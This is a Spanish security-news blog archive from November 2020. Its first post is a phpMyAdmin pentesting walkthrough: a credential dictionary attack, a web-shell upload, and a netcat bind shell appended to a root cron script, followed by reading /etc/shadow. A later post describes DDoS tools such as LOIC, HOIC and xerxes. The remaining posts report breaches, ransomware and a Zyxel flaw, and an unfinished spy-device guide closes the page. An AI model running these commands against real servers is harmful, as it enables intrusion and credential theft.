RaFa Núñez Aponte: noviembre 2020

lunes, 30 de noviembre de 2020

Como hackear base de datos MySQL. Pentesting a phpMyAdmin

Las implementaciones vulnerables siguen siendo uno de los principales vectores de ataque. En esta ocasión, los expertos en pentesting del Instituto Internacional de Seguridad Cibernética (IICS) presentan con ejemplos claros una de las formas de obtener un shell con derechos de superusuario en un sistema Linux remoto utilizando la configuración vulnerable de phpMyAdmin.

La explotación de instalaciones vulnerables de phpMyAdmin es un buen ejemplo de proyectos participantes en eventos Capture the Flag (CTF), aunque este enfoque también cuenta con aplicaciones adaptables a muchas otras aplicaciones web. Este artículo resultará útil tanto para los principiantes en el campo del pentesting como para aquellos con más experiencia en las pruebas de seguridad y ataques a phpMyAdmin.

¿Qué es phpMyAdmin?

Esta es una aplicación web para la administración de bases de datos MySQL locales empleada generalmente en proyectos de código abierto, por lo que algunos desarrolladores ni siquiera toman en cuenta la existencia de esta aplicación en sus sistemas. Además, los desarrolladores también usan phpMyAdmin en entornos de prueba, lo que eventualmente conduce a instalaciones no supervisadas en redes corporativas de forma continua.

Acorde a los expertos en pentesting, lo ideal es comenzar por buscar los sistemas en los que phpMyAdmin está instalado.

¿Cómo encontrar servidores con phpMyAdmin?

Por lo general, los recursos que utilizan esta aplicación se encuentran en el servidor Apache, aunque no se limita a esta solución. En ocasiones phpMyAdmin se instala en el directorio root, más frecuentemente en la carpeta /phpMyAdmin, accesible mediante http://server/phpMyAdmin. Dicho esto, buscaremos servidores web que ejecuten phpMyAdmin usando nuestro escáner de puertos Nmap favorito:

nmap -sT -sV -p80,443 192.168.1.0/24 -oA phpMyAdmin_scan

A continuación, en el archivo phpMyAdmin_scan.gnmap generado, busque servidores con puertos abiertos usando el siguiente comando:

grep -i "open" phpMyAdmin_scan.gnmap

Como resultado, encontramos varios servidores ejecutando Apache. Ahora necesita determinar dónde está instalado phpMyAdmin: en el directorio root o en la carpeta /phpMyAdmin.

Acceder a entornos con NAT

En este ejemplo, los especialistas en pentesting asumirán que todas las pruebas se realizan desde un sistema en un entorno NAT, lo que requiere de una conexión al servidor SSH detrás del firewall.

Dado que la conexión al entorno NAT es a través de SSH, reenviaremos el puerto 80 a través del túnel SSH para acceder al servidor web con la dirección IP 192.168.1.171. En la mayoría de los casos no necesitaremos reenvío de puertos, aunque los expertos en pentesting consideran pertinente contemplar este escenario; a continuación se muestra un diagrama referente a este enlace.

A continuación se muestran dos ejemplos de tunelización SSH a un servidor web objetivo.

Para Linux (cliente SSH):

ssh pentest@ssh.servers.com -L 2222: 192.168.1.171: 80

Para Windows (cliente PuTTY):

Después de configurar el reenvío de puertos, podemos conectarnos a phpMyAdmin ingresando la dirección https://ift.tt/2WHltCQ en nuestro navegador local.

Ataque de Diccionario

Una vez que se encuentra el servidor phpMyAdmin, el siguiente paso es verificar si se usa la cuenta predeterminada (usuario root sin contraseña). En este caso, se supone que la cuenta estándar no está en uso, aunque esto no tiene por qué ser un problema.

Es posible implementar el escenario más simple usando un diccionario para verificar las posibles combinaciones de nombre de usuario y contraseña, aunque lo más recomendable es comprobar si un ataque de diccionario podría bloquear la cuenta en cuestión. Hay muchos diccionarios excelentes, pero usaremos la lista a continuación:

Una lista de usuarios:

echo root >> /tmp/users.txt
echo admin >> /tmp/users.txt
echo user >> /tmp/users.txt

Lista de contraseñas

echo password >> /tmp/passwords.txt
echo Password >> /tmp/passwords.txt

Otras utilidades como Burp Intruder permiten desplegar ataques de diccionario contra phpMyAdmin y otras aplicaciones web. Por otra parte, los expertos en pentesting usan Metasploit, pues esta utilidad tiene un módulo incorporado para desplegar ataques de diccionario; esta herramienta está incluida por defecto en Kali Linux. A continuación se muestra una lista básica de comandos.

msfconsole
use auxiliary/scanner/http/phpMyAdmin_login
set rhosts 192.168.1.171
set USER_AS_PASS true
set targeturi /phpMyAdmin/index.php
set user_file /tmp/users.txt
set pass_file /tmp/passwords.txt
run

A continuación podemos apreciar una captura de pantalla de un ataque de diccionario exitoso.

Si después del ataque se encuentra una cuenta de usuario válida, puede iniciar sesión y continuar con el siguiente paso.

Cargar shells web al servidor usando phpMyAdmin

Una vez que encontramos la cuenta válida, el siguiente paso es encontrar una funcionalidad para ejecutar comandos del sistema operativo del servidor. MySQL reconoce funciones personalizadas que podrían resultar útiles en estos casos, sin embargo, cargaremos el shell web en el directorio root usando la función OUTFILE.

Recuerde que, en la mayoría de los entornos de varios niveles deberá escribir el shell web en el directorio root mediante inyección SQL no funcionará, ya que la base de datos y el servidor web se encuentran en ubicaciones diferentes. Recuerde también que, en algunos casos, es posible que la cuenta de servicio mysql no tenga acceso de escritura al directorio root o a la carpeta phpMyAdmin.

Haga clic en el botón “SQL” para abrir una ventana para ingresar consultas. Luego, ejecute la solicitud que se muestra en la figura a continuación para cargar un shell web escrito en PHP en el servidor, que se puede usar para ejecutar comandos en el sistema operativo bajo la cuenta de servicio Apache. Recuerde que es posible que phpMyAdmin no siempre esté instalado en el directorio /var/www/phpMyAdmin si está trabajando en entornos reales. A continuación se muestra un ejemplo en el contexto del trabajo con phpMyAdmin.

Ahora el shell web descargado está disponible en https://ift.tt/3moVtpV y podemos intentar ejecutar comandos en el sistema operativo y realizar una escalada de privilegios. A continuación se muestran los comandos para comenzar:

whoami
ls –al
ls /

Después de completar todas las operaciones necesarias, no olvide quitar el shell web. Agregue autenticación para no crear agujeros de seguridad.

Es hora de buscar archivos y carpetas disponibles para escribir a todos los usuarios. La presencia de tales archivos y carpetas en el sistema no es necesariamente algo malo, pero si es posible ejecutarlo directa o indirectamente en nombre del superusuario, entonces existen posibilidades de escalada de privilegios, señalan los especialistas en pentesting.

A continuación se muestra un comando que se ejecuta a través de un shell cargado para buscar archivos y carpetas de este tipo:

find / -maxdepth 3 -type d -perm -777 2> / dev / null

Ahora podemos comenzar a examinar los archivos encontrados para su explotación, así como a buscar objetivos potencialmente vulnerables.

Operación del script rootcron.sh

En nuestro caso, uno de los directorios sobre los que podemos escribir es /scripts/. Esta carpeta parece contener un script para ejecutar trabajos cron como superusuario, aunque es una rara posibilidad.

La misma tecnología se puede aplicar a los scripts utilizados con el comando sudo. Hay muchas cosas que se pueden programar para realizar tareas, sin embargo, agregaremos una línea para iniciar el oyente de netcat como root y luego conectaremos a este oyente desde nuestra máquina.

ls /scripts
cat /scripts/rootcron.sh
echo "nc -l -p12345 -e /usr/bin/sh&amp; 2>/dev/null" >> /scripts/rootcron.sh
cat /scripts/rootcron.sh

Debe esperar a que comience la tarea, después de lo cual puede conectarse al oyente en el puerto 12345 desde su sistema.

nc 192.168.1.171 12345
whoami
pwd
cat /etc/shadow
w

Si bien este es un escenario didáctico, en ocasiones la realidad supera las expectativas. Aunque estas situaciones son raras, se han visto casos en el pentesting de la vida real. Para escenarios que requieren un shell inverso en lugar de un shell de enlace, pentestmonkey.net proporciona varias opciones útiles. Puede encontrar en línea múltiples ejemplos del proceso de instalación del listener netcat.

Conclusión

En este artículo los expertos del IICS demuestran una de las formas de obtener un shell con derechos de superusuario en un sistema Linux remoto utilizando la configuración phpMyAdmin vulnerable y un script ejecutado como root que se puede ser editado. Si bien hay muchas formas de lograr la misma tarea, este ejemplo demuestra que los paneles de administración de aplicaciones web pueden ser objetivos bastante accesibles y, a menudo, son el punto de partida para ejecutar comandos del sistema operativo.

El cargo Como hackear base de datos MySQL. Pentesting a phpMyAdmin apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Vulnerabilidad crítica de ejecución remota de código en todos los firewalls y VPN de ZYXEL. Instale el parche ahora

Los equipos de seguridad de Zyxel han confirmado el hallazgo de una vulnerabilidad crítica que afecta sus soluciones de firewall y puntos de acceso VPN que permitiría a los actores de amenazas ejecutar código remoto en el sistema de la víctima.

Identificada como CVE-2020-25014, esta es una falla de desbordamiento de búfer que puede ser manipulada a través de una entrada desconocida, conduciendo a problemas de corrupción de memoria que podrían generar un severo impacto en el dispositivo de las víctimas.

La vulnerabilidad recibió un puntaje de 8.5/10 según el Common Vulnerability Scoring System (CVSS) y los expertos consideran que es altamente fácil de explotar, aunque se desconocen detalles adicionales. En su reporte, Zyxel menciona: “Un desbordamiento de búfer basado en pila en fbwifi_continue.cgi en Zyxel UTM y la serie VPN de pasarelas que ejecutan la versión de firmware V4.30 hasta la V4.55 permite a los atacantes remotos no autenticados ejecutar código arbitrario a través de un paquete http diseñado”.

Además, todos los productos Zyxel afectados por la falla son compatibles con la función WiFi de Facebook, por lo que los desarrolladores publicaron parches para todos los productos relevantes.

Esta no es la primera vez que una empresa que ofrece servicios de seguridad se encuentra parcheando sus propias vulnerabilidades. La semana pasada, la firma de ciberseguridad Sophos reveló que fue víctima de una brecha de datos que pudo haber comprometido información confidencial para un pequeño número de clientes.

Aunque la falla puede ser explotada por actores de amenazas remotos a través de Internet, aunque los especialistas no han detectado intentos de explotación en escenarios reales.

Las vulnerabilidades ya han sido corregidas, por lo que se recomienda a los usuarios de implementaciones afectadas actualizar a la brevedad.

El cargo Vulnerabilidad crítica de ejecución remota de código en todos los firewalls y VPN de ZYXEL. Instale el parche ahora apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Nuevos ciberataques biológicos presentados por expertos permiten la creación de nuevos virus como COVID

Un grupo de especialistas ha detallado un método de ciberataque que podría presentar severos riesgos para sectores como la investigación biológica. Esta semana, los académicos de la Universidad Ben-Gurion del Negev describieron cómo los biólogos y científicos poco informados en ciberseguridad podrían convertirse en víctimas de ciberataques diseñados para llevar la guerra biológica a niveles inusitados.

Esto es especialmente peligroso en el momento actual, pues una parte considerable de la comunidad científica mundial está a punto de dar importantes pasos en la búsqueda de posibles vacunas contra el coronavirus. Acorde al reporte, los científicos podrían ser engañados para producir toxinas o virus altamente peligrosos empleando campañas de hacking malicioso.

Todo este ataque depende del uso de una variante de malware capaz de infiltrarse en el equipo de cómputo de alguno de estos investigadores. Una vez dentro, los actores de amenazas podrían reemplazar subcadenas en la secuencia del ADN empleando procesos de ofuscación simples y engañando a los usuarios de un sistema de amplio uso en el campo de la investigación médica.

“El Departamento de Salud y Servicios Humanos de E.U. (HHS) requiere que se establezcan protocolos de detección de ADN potencialmente dañino, no obstante, empleando este ataque los hackers podrían eludir los mecanismos de seguridad para alterar los avances en estas investigaciones y convertir proyectos destinados a salvar millones de vidas en armas biológicas mortales”, menciona el reporte.

El software utilizado para diseñar y administrar proyectos de ADN sintético también puede ser susceptible a ataques Man-in-The-Middle (MiTM), lo que permitiría a los hackers inyectar cadenas de ADN arbitrarias. “Los hackers remotos podrían usar extensiones maliciosas o cualquier otra variante de ataque basado en un navegador web”, añaden los expertos.

Rami Puzis, uno de los especialistas que colaboraron en esta investigación, considera que no deben desestimarse los riesgos detectados en este proceso: “Este escenario de ataque subraya la necesidad de fortalecer la cadena de suministro de ADN sintético con protecciones contra una combinación de amenazas biológicas y cibernéticas. Para hacer frente a estas amenazas, proponemos un algoritmo de detección mejorado que tiene en cuenta la edición de genes in vivo”, añade el experto. La investigación sigue en curso, por lo que más detalles podrían ser revelados en breve.

El cargo Nuevos ciberataques biológicos presentados por expertos permiten la creación de nuevos virus como COVID apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

viernes, 27 de noviembre de 2020

Hacker vende acceso a 448 servidores de la Comisión Nacional de Seguros y Fianzas de México (CNSF). ¿Fuga de datos de millones de mexicanos?

Especialistas de una firma de ciberseguridad reportan que un hacker malicioso está vendiendo el acceso de administrador al dominio de la Comisión Nacional de Seguros y Finanzas (CNSF), organismo público mexicano encargado de la supervisión de las instituciones y sociedades mutualistas de seguros, instituciones de fianzas e intermediarios de reaseguro. La publicación fue hallada en un foro de dark web.

El cibercriminal también afirma haber robado más de 10GB de información confidencial. Debido a que esta comisión depende de la Secretaría de Hacienda y Crédito Público (SHCP), la información comprometida podría ser de carácter altamente sensible.

A Threat Actor is selling Domain Admin access to the Comisión Nacional de Seguros y Fianzas of Mexico 🇲🇽 (Part of Ministry of Finance and Public Credit – https://t.co/qUWq9sxSyK)

The Actor also claims to have stolen over 10GB of confidential data.
cc @unamcert pic.twitter.com/vdJSCIViOv
— Bank Security (@Bank_Security) November 26, 2020

En su publicación, detectada en un foro ilegal de hacking, el usuario no identificado asegura que cuenta con acceso a todos 448 servidores de CNSF y 2 cuentas de administrador de dominio. El vendedor asegura que aún no termina de analizar el acceso, por lo que podría haber mucho más por descubrir.

Por ahora el gobierno mexicano no se ha pronunciado al respecto, lo cual podría tener que ver con una medida para no entorpecer las investigaciones oficiales.

Por desgracia los errores al almacenar información confidencial son un grave problema para las organizaciones públicas a nivel mundial. Acorde a especialistas en seguridad informática, la mayoría de los incidentes de filtración de información confidencial o exposición de acceso a sistemas de almacenamiento y servidores web.

Los actores de amenazas suelen escanear Internet empleando herramientas avanzadas para detectar estas filtraciones y tratar de obtener ganancias con los recursos comprometidos. Una vez que consiguen acceso, los criminales publican sus filtraciones en foros de hacking, esperando encontrar algún comprador interesado en la información. De ser así, los interesados suelen acordar transacciones en criptomoneda, principalmente Bitcoin, gracias a la dificultad que conlleva tratar de rastrear una operación blockchain.

Monitoreando foros de dark web en busca de información sobre amenazas, los expertos encontraron al hacker vendiendo este acceso y ofreciendo muestras de la información expuesta. Al parecer este vendedor cuenta con buena reputación en foros de hacking, por lo que es altamente probable que se trate de una amenaza real.

La amplia disponibilidad de documentos y bases de datos confidenciales no es una problemática nueva, pero la constante aparición de reportes sobre estos incidentes enfatiza la necesidad de crear mejores mecanismos de seguridad para administrar la información confidencial de los usuarios, tratando de prevenir estas brechas de datos a toda costa.

La investigación de este caso sigue en curso, por lo que es probable que más detalles aparezcan a la brevedad.

El cargo Hacker vende acceso a 448 servidores de la Comisión Nacional de Seguros y Fianzas de México (CNSF). ¿Fuga de datos de millones de mexicanos? apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Hacker vende 16 millones de registros de pacientes diagnosticados con COVID-19 después de filtrar 350 mil datos de pacientes de México, Argentina, Colombia y Perú

La información de más de 16 millones de ciudadanos brasileños diagnosticados con COVID-19, incluyendo al presidente Jair Bolsonaro, han sido expuestos en línea. Al parecer este incidente no fue resultado de un ciberataque, sino que se debe al descuido de un empleado del sector salud, quien compartió en GitHub una hoja de cálculo que contiene las claves de acceso a múltiples sistemas gubernamentales.

Aunque la hoja de cálculo expuesta ya ha sido removida del repositorio, los funcionarios del gobierno brasileño decidieron revocar todas las claves potencialmente expuestas y restablecer las contraseñas de sus sistemas informáticos. A pesar de este reporte, expertos aseguran que se trata del mismo hacker que comprometió la información de cientos de miles de pacientes COVID-19 en Latinoamérica.

En venta datos personales de 350 mil pacientes de COVID-19 de México, Perú, Colombia y Argentina. A las empresas de desinfección o seguros médicos le interesará esta base de datos

La filtración fue detectada por un usuario de GitHub, que encontró un documento inusual publicado por el Hospital Albert Einstein. Expertos locales analizaron la hoja de cálculo, descubriendo que contenía las contraseñas a estos sistemas sensibles. Al descubrir de qué se trataba, el usuario notificó al Ministerio de Salud de Brasil.

La hoja de cálculo contenía acceso a los sistemas Sivep-Gripe y E-SUS-VE, nombre clave de las bases de datos gubernamentales que almacenan la información de los pacientes de COVID-19. El primero de estos sistemas administra el seguimiento de los pacientes hospitalizados, mientras que el segundo registra la información de los pacientes con síntomas leves.

Uno de los expertos que analizó la exposición asegura que estos sistemas han estado expuestos por alrededor de un mes. Entre los detalles comprometidos destacan:

Nombres completos
Domicilios
Números telefónicos
Identificación de contribuyente
Detalles médicos

Como se menciona arriba, el incidente afectó a múltiples personalidades brasileñas, incluyendo al presidente Bolsonaro y su familia, representantes en el Congreso, algunos ministros y gobernadores de 17 estados. Aún se desconoce si algún grupo de actores de amenazas logró acceder a la información comprometida.

La exposición de datos de pacientes diagnosticados con coronavirus se ha vuelto un problema muy común. Hace unas semanas, los especialistas de una firma de ciberseguridad encontraron a un cibercriminal vendiendo una base de datos de pacientes COVID-19.

Al parecer, este hacker estaba vendiendo 350 mil registros, incluyendo nombres completos, teléfonos y direcciones de personas que han contraído el virus. Los incidentes de brecha de seguridad sin duda son muestra de lo vulnerable que son los sistemas informáticos, recordando las más de 80 empresas de salud que han sido víctimas recientes de estas amenazas en Estados Unidos, América Latina y algunos países de Europa.

El cargo Hacker vende 16 millones de registros de pacientes diagnosticados con COVID-19 después de filtrar 350 mil datos de pacientes de México, Argentina, Colombia y Perú apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

jueves, 26 de noviembre de 2020

10 Herramientas y Técnicas Gratuitas Para Protegerse del Ataque DDoS y Contraatacar

Un ataque de denegación distribuida de servicios (DDoS) es un método de hacking que tiene por objetivo enviar una inmensa cantidad de solicitudes fraudulentas a un sitio web. Como resultado de este ataque, los servidores afectados serán incapaces de procesar esta cantidad absurda de solicitudes, por lo que los usuarios no podrán acceder al sitio web atacado.

Muchas veces los atacantes lanzan estos ataques para deshacerse de la competencia en momentos determinados, por lo que los sitios comerciales y de información son víctimas frecuentes de este ataque. Otros grupos de hacking también suelen usar los ataques DDoS para extorsionar a sus víctimas y obtener dinero fácil.

MÉTODOS DE HACER CONTRAATAQUE DDOS

Acorde a los especialistas en pentesting del Instituto Internacional de Seguridad Cibernética (IICS), existen tres métodos principales para desplegar estos ataques:

Por ancho de banda: Se basa en el envío de una gran cantidad de solicitudes a un sitio web a través de los protocolos TCP, UDP e ICMP. Las solicitudes maliciosas consumen el ancho de banda y generan la condición de denegación de servicio
Basado en el protocolo del servidor: Este ataque se dirige a servicios específicos del servidor y puede ser desplegado mediante TCP, UDP e ICMP. Estos ataques son conocidos como inundaciones, debido a que el servidor debe responder con una solicitud ASK. Debido a la gran cantidad de solicitudes de este tipo, el servidor a menudo no puede hacer frente al ataque y se bloquea
Explotación de errores en sitios web específicos: Este ataque es difícil de desplegar, pues depende del análisis del sistema de la víctima. Dada su dificultad, este método está reservado solo para los hackers más habilidosos

HERRAMIENTAS DE APOYO PARA EL LANZAMIENTO DE ATAQUES DDOS

Linux

Descargar el marco de Metasploit
Miramos el contenido del directorio:

root @ slogin: ~ cd metasploit-framework/embedded/framework/modules/auxiliary/dos

Todas estas son herramientas útiles para comprobar por vulnerabilidades DDoS en un sistema objetivo. También hay muchos programas útiles en Exploit Database.

Windows – LOIC

Low Orbit Ion Cannon (LOIC) es quizás el programa DDoS más popular. Esta herramienta permite a los actores de amenazas enviar solicitudes masivas a través de protocolos ICMP, por lo que UDP obstruye el canal al servidor de la víctima. El ataque LOIC más famoso fue llevado a cabo por el famoso grupo hacktivista Anonymous en 2009, comprometiendo los sistemas de compañías como PayPal, Visa y MasterCard como respuesta a su decisión de cortar las campañas de recaudación fondos de WikiLeaks.

LOIC está disponible en el siguiente enlace.

HOIC

HOIC fue desarrollado durante la Operación Payback por Praetox por el mismo equipo que desarrolló LOIC, mencionan los expertos en pentesting. No obstante, a diferencia de LOIC, HOIC usa el protocolo HTTP con el fin de enviar un flujo de solicitudes HTTP GET y POST de forma aleatoria.

Los desarrolladores afirman que esta herramienta puede atacar hasta 256 dominios diferentes. HOIC puede ser descargado desde SourceForge.

VERIFICACIÓN DDOS PARA PRINCIPIANTES

Los expertos en pentesting señalan que este ejemplo se realizará en el sistema operativo Linux, por lo que habrá que instalar este sistema para luego escribir un comando y descargar la aplicación.

Cargue la extensión de archivo .c, que se encuentra siguiendo la ruta Home> xerxes
Entraremos en el siguiente directorio

Ahora compílelo desde el formato “.c” a “.exe” con el comando gcc xerxes.c

Luego tomamos cualquier sitio y lo indicamos en el terminal con una mención del puerto 80 para ejecutarlo

Si el sitio es vulnerable a ataques DDoS, dejará de abrirse

¿CÓMO PROTEGERSE DE UN ATAQUE DDOS?

Deje de usar Windows Server

La mayoría de los sitios ejecutados con Windows Server son altamente vulnerables a ataques DDoS, por lo que es altamente recomendable buscar otras opciones para trabajar.

Apache también es muy deficiente

Si tiene Apache, al menos podría considerar colocar un proxy de almacenamiento en caché, pues esta solución es altamente sensible a los ataques contra sus servidores. Acorde a los especialistas en pentesting, es posible atacar un servidor Apache incluso usando un smartphone o tableta usando el método Slowloris.

Si desea seguir usando Apache, puede prevenir estos ataques usando parches como Anti-slowloris.diff, mod_noloris, mod_antiloris, mod_limitipconn y mod_reqtimeout.

Use el módulo testcookie

El módulo testcookie-nginx puede ser la defensa ideal contra ataques DDoS. Este módulo solo puede proteger sus sistemas contra bots, aunque es posible configurar funciones avanzadas como el procesamiento de redireccionamientos.

Acorde a los expertos en pentesting, testcookie-nginx actúa como un eficaz filtro entre los bots y el backend en un ataque DDoS, lo que permite filtrar las soluciones maliciosas y evitar que el sitio web atacado colapse. Esta verificación ocurre para escenarios como:

¿Sabe el cliente cómo realizar la redirección HTTP?
¿Es compatible con JavaScript?
¿Es el navegador que dice ser?

La verificación se implementa mediante cookies utilizando diferentes métodos:

“Set-Cookie” + redireccionamiento usando la ubicación HTTP 301
“Set-Cookie” + redireccionamiento mediante meta actualización HTML

Si planea mantener testcookie de forma permanente, asegúrese de no desaparecer de los resultados de búsqueda; crea problemas para los usuarios con enlaces, navegadores w3m y similares; tenga en mente que este método no protege de bots equipados con un motor de navegador completo con JavaScript. En resumen, testcookie_module no es un método universal.

Red neural

Tomamos la red neuronal PyBrain, insertamos los registros y analizamos las solicitudes. En este caso, es muy útil tener access.log antes de que comience el DDoS, ya que describe casi el 100% de los clientes legítimos Además, los bots no son siempre visibles.

Análisis de errores

Analice el volumen de tráfico, el tiempo de respuesta del servidor y la la cantidad de errores. En nginx, el tiempo de respuesta del servidor se registra en el registro mediante dos variables: request_time y upstream_response_time. El primero es el tiempo total de ejecución de la solicitud, incluidos los retrasos de la red entre el usuario y el servidor; el segundo dice cuánto tiempo el backend completó la solicitud.

El valor upstream_response_time es extremadamente importante para sitios con mucho contenido dinámico y comunicación activa de front-end con la base de datos, y no debe descuidarse.

Seguimiento del número de solicitudes por segundo

En el caso de nginx, puede estimar aproximadamente este valor con el siguiente comando de shell. La variable ACCESS_LOG contiene la ruta al registro de solicitudes de nginx en el formato combinado:

echo $ (($ (fgrep -c “$ (env LC_ALL = C date – date = @ $ (($ (date \ +% s) -60)) +% d /% b /% Y:% H:% M) ”“ $ ACCESS_LOG ”) / 60))

En comparación con el nivel normal para esta hora del día, la cantidad de solicitudes por segundo puede disminuir o aumentar. Crecen si llega un bot grande, y caen si el bot colapsa el sitio, haciéndolo completamente inaccesible para los usuarios legítimos.

La caída en el número de solicitudes se observa precisamente debido a la estática. Pero, de una forma u otra, estamos hablando de cambios importantes en los indicadores.

Tcpdump

Esta es una herramienta de diagnóstico que permite descubrir errores en el kernel de Linux cuando se abre una conexión TCP, lo que puede resultar útil para prevenir ataques DDoS.

Tamaños de búferes en nginx

No es ningún secreto que cada recurso tiene un límite. En primer lugar, esto se aplica a la RAM, por lo que los tamaños de los encabezados y todos los búferes utilizados deben limitarse a valores adecuados por cliente y por servidor en su conjunto. Deben estar registrados en la configuración de nginx.

client_header_buffer_size__: Establece el tamaño del búfer para leer el encabezado de la solicitud del cliente. Si la cadena de solicitud o el campo de encabezado de solicitud no se ajusta completamente a este búfer, se asignan búferes más grandes, especificados por la directiva large_client_header_buffers
large_client_header_buffers: Especifica el número máximo y el tamaño de búferes para leer un encabezado de solicitud de cliente grande
client_body_buffer_size: Especifica el tamaño del búfer para leer el cuerpo de la solicitud del cliente. Si el cuerpo de la solicitud es más grande que el búfer especificado, entonces todo el cuerpo de la solicitud o solo una parte se escribe en un archivo temporal
client_max_body_size: Especifica el tamaño máximo permitido del cuerpo de la solicitud del cliente. Si el tamaño es mayor que el tamaño especificado, el error 413 se devuelve al cliente

Configurando tiempos de espera en nginx

El tiempo también es un recurso. Por lo tanto, el siguiente paso importante debe ser establecer todos los tiempos de espera:

reset_timedout_connection on: Ayuda a lidiar con los enchufes atascados en la fase FIN-WAIT
client_header_timeout: Especifica el tiempo de espera al leer el encabezado de la solicitud del cliente
client_body_timeout: Especifica el tiempo de espera al leer el cuerpo de la solicitud del cliente
keepalive_timeout: Especifica el tiempo de espera durante el cual el servidor no cerrará la conexión Keep-Alive con el cliente
send_timeout: Especifica el tiempo de espera al enviar una respuesta al cliente. Si pasado este tiempo el cliente no acepta nada, se cerrará la conexión

Limitar conexiones en nginx

Nginx también tiene la capacidad de limitar conexiones y solicitudes. Si no está seguro de cómo se comportará cierta parte de su sitio, lo ideal es que lo pruebe, comprenda cuántas solicitudes resistirá y escriba esto en la configuración de nginx. Supongamos que el sitio tiene secciones con nombres/descarga y /búsqueda que se explican por sí mismos. Al hacerlo, nosotros:

No queremos que los bots obstruyan la tabla de conexiones TCP con sus descargas
No queremos que los bots agoten los recursos informáticos del DBMS con muchas consultas de búsqueda

TENDENCIAS DDOS

El poder de los ataques a la red y las capas de transporte aumenta constantemente. Se ha alcanzado el potencial del ataque de inundación SYN promedio.
Los ataques al DNS han tenido una gran demanda últimamente. La inundación de UDP con solicitudes de DNS válidas con direcciones IP de origen falsificadas es una de las más fáciles de implementar y difíciles de contrarrestar los ataques. Muchas grandes empresas han experimentado problemas recientemente como resultado de ataques a sus servidores DNS
La proporción de bots equipados con un motor de navegador completo con JavaScript es todavía pequeña, pero está en constante crecimiento

RECURSOS CON LOS QUE ES MEJOR NO ENTROMETERSE

http: //viewdns.info/

https: //iphostinfo.com/

Y recuerde que todo lo anterior es para fines didácticos. Solo se puede usar en sus propios proyectos o con previa autorización de los operadores legítimos.

El cargo 10 Herramientas y Técnicas Gratuitas Para Protegerse del Ataque DDoS y Contraatacar apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Sophos, la empresa de ciberseguridad y firewalls sufre una filtración de datos y expone los datos personales de algunos clientes

Los especialistas de la firma de seguridad Sophos han notificado a algunos de sus clientes sobre un incidente de exposición de datos derivado de falla de seguridad detectada este martes. Los datos de los usuarios se filtraron debido a la configuración errónea de una herramienta usada por la compañía para el almacenamiento de la información de los usuarios.

En un comunicado, la compañía señaló algunos detalles sobre el ataque: “El pasado 24 de noviembre fuimos notificados de un problema de acceso no autorizado en una herramienta utilizada para almacenar información sobre los clientes que se han puesto en contacto con el área de soporte. Como resultado del ataque, se filtraron algunos datos de un reducido número de clientes”.

Sophos no proporcionó detalles sobre quién descubrió la falla en esta herramienta o el número exacto de usuarios afectados. La información comprometida incluye detalles como el nombre completo de los usuarios, sus direcciones email y números de teléfono en caso de que hayan sido compartidos con Sophos.

La firma de seguridad también mencionó que el incidente ya ha sido completamente mitigado: “La privacidad y la seguridad del cliente son siempre nuestra prioridad. Estamos contactando a todos los clientes afectados”. “Además, estamos implementando medidas adicionales para garantizar que la configuración de los permisos de acceso sea segura de forma continua”, agregó Sophos.

La compañía ha atravesado por más problemas de los normales. A inicios de 2020, Sophos corrigió una falla día cero de inyección SQL en su solución XG Firewall después de recibir informes sobre algunos casos de explotación activa. Los hackers usaban el malware Asnarök para explotar la falla y robar los nombres y contraseñas de los usuarios del firewall.

Reportes posteriores indican que esta misma solución de firewall también fue explotada para tratar de entregar cargas útiles del ransomware Ragnarok en las implementaciones del sistema Windows utilizadas por la compañía. Aunque esta campaña de ataque fue infructífera, se mantuvo activa por un tiempo considerable.

El cargo Sophos, la empresa de ciberseguridad y firewalls sufre una filtración de datos y expone los datos personales de algunos clientes apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Ataque de ransomware cierra todas las escuelas en Baltimore

Según un reporte de los funcionarios públicos de Baltimore, todas las escuelas públicas del condado tuvieron que detener sus operaciones después de ser afectadas por una infección de ransomware. El reporte, firmado por el Superintendente Darryl Williams, señala que las escuelas fueron cerradas con el fin de limitar el impacto del ataque y poder iniciar la investigación.

Según Williams, todos los sistemas de red del distrito por ahora permanecerán inaccesibles debido a que el actor de amenazas no identificado logró tomar el control de estos recursos con el fin de exigir un rescate a cambio de restablecer todo a la normalidad.

Las autoridades locales no revelaron el monto del rescate exigido por el hacker o hackers ni la variante de malware empleada: “Apenas hemos comenzado la investigación; sé que hay interés en obtener más información sobre el incidente, pero por el momento no podemos agregar más detalles”, mencionó Melissa Hyatt, jefa de policía del condado de Baltimore.

City Schools is aware of computer network challenges today in Baltimore County schools. Students participating in virtual learning should only use City Schools-issued laptops or devices. Students without access to a City Schools-issued device will be granted an excused absence.
— Baltimore City Public Schools (@BaltCitySchools) November 25, 2020

El incidente ya ha llegado a oídos del Buró Federal de Investigaciones (FBI), que emitió un breve mensaje al respecto: “Estamos al tanto del ciberataque contra las escuelas del condado de Baltimore. En concordancia con su política habitual, el FBI no confirma ni niega la existencia de una investigación al respecto, pero refrendamos nuestra voluntad de cooperar en el proceso”.

Al tratarse de la infraestructura informática de decenas de escuelas públicas, el incidente fue percibido por cientos de padres de familia. Amy, madre de un alumno, afirma que todo comenzó a fallar desde la noche anterior: “Traté de conectarme a una reunión de la unta directiva pero de repente la pantalla se puso azul”. Las autoridades escolares locales pidieron a los padres de familia usar solo equipos portátiles para las próximas sesiones y hasta nuevo aviso.

Finalmente, la Asociación de Maestros del Condado de Baltimore solicitó a los padres de familia que dejen sus computadoras de escritorio apagadas y que no las enciendan hasta que reciban noticias del distrito escolar para prevenir cualquier nuevo brote. No se ha proporcionado más información hasta el momento.

El cargo Ataque de ransomware cierra todas las escuelas en Baltimore apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

miércoles, 25 de noviembre de 2020

Cómo crear un dispositivo espía en un mouse para escuchar conversaciones en una oficina como la CIA

Todos usamos teléfonos en la actualidad, y muchas veces compartimos información confidencial a través de estos dispositivos, lo que puede resultar atractivo para los hackers. En esta ocasión los especialistas del Instituto Internacional de Seguridad Cibernética (IICS) le mostraremos cómo elaborar un dispositivo para escuchar conversaciones usando dispositivo de espionaje empleando componentes realmente simples.

